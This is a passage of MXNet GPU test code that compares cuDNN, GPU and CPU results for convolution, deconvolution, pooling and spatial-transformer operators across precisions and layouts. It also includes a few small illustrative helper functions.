check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
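# A small added helper (illustrative only, not used by the tests): along one axis a dilated
# kernel touches kernel + (kernel - 1) * (dilate - 1) input positions, which is the geometry
# the dilate > 1 cases above exercise.
def _effective_kernel_extent(kernel, dilate):
    return kernel + (kernel - 1) * (dilate - 1)
assert _effective_kernel_extent(3, 2) == 5   # a 3-tap kernel with dilate=2 spans 5 inputs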
@with_seed()
@pytest.mark.serial
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
            # kernel overlap. The non-cudnn conv op doesn't do this, so it is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
                # tol can be pretty high; we're looking for a large diff due to a corrupted workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@pytest.mark.skip(reason="skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
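# An added sketch (new helper, not run by the test suite; it assumes the module-level
# `mx` import and the NDArray autograd API) of what grad_req='add' means for the two
# large-c tests above: each backward pass accumulates into the existing gradient buffer
# instead of overwriting it, i.e. the wgrad beta == 1.0 path the comments refer to.
def _illustrate_grad_req_add():
    x = mx.nd.ones((2, 2))
    x.attach_grad(grad_req='add')
    for _ in range(2):
        with mx.autograd.record():
            y = (3 * x).sum()
        y.backward()
    # two accumulating passes of d/dx[sum(3x)] = 3 give 3 + 3 = 6 everywhere
    assert (x.grad.asnumpy() == 6).all()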
@with_seed()
@pytest.mark.serial
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
@pytest.mark.serial
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
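# A numpy-only sketch (added helper, not part of the test run) of why float16 results are
# only compared within the same precision here: float16 spacing around 1.0 is roughly 1e-3,
# so contributions that survive a float32 accumulation can be rounded away in float16.
def _illustrate_float16_rounding():
    import numpy as np
    assert np.finfo(np.float16).eps > 9e-4                        # ~0.000977
    assert np.float16(1.0) + np.float16(1e-4) == np.float16(1.0)  # increment lost in fp16
    assert np.float32(1.0) + np.float32(1e-4) != np.float32(1.0)  # still visible in fp32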
@pytest.mark.serial
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
@pytest.mark.serial
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
@pytest.mark.serial
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
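# A rough numpy sketch (added helper; the normalized [-1, 1] coordinates and (x, y) row
# order are assumptions and may not match GridGenerator's exact conventions) of why the
# affine case above feeds shape (batch, 6): the six parameters per sample form a 2x3 matrix
# applied to every homogeneous target-grid coordinate.
def _affine_grid_sketch(theta, target_shape):
    import numpy as np
    h, w = target_shape
    ys, xs = np.meshgrid(np.linspace(-1, 1, h), np.linspace(-1, 1, w), indexing='ij')
    coords = np.stack([xs.ravel(), ys.ravel(), np.ones(h * w)])    # (3, h*w) homogeneous
    grid = np.matmul(theta.reshape(-1, 2, 3), coords)              # (batch, 2, h*w)
    return grid.reshape(theta.shape[0], 2, h, w)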
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
@pytest.mark.serial
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
                # Add the pad and stride params when they differ from the defaults,
                # and randomly even when they match the defaults
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
# Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
    # For those cases when all implementations should match: the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
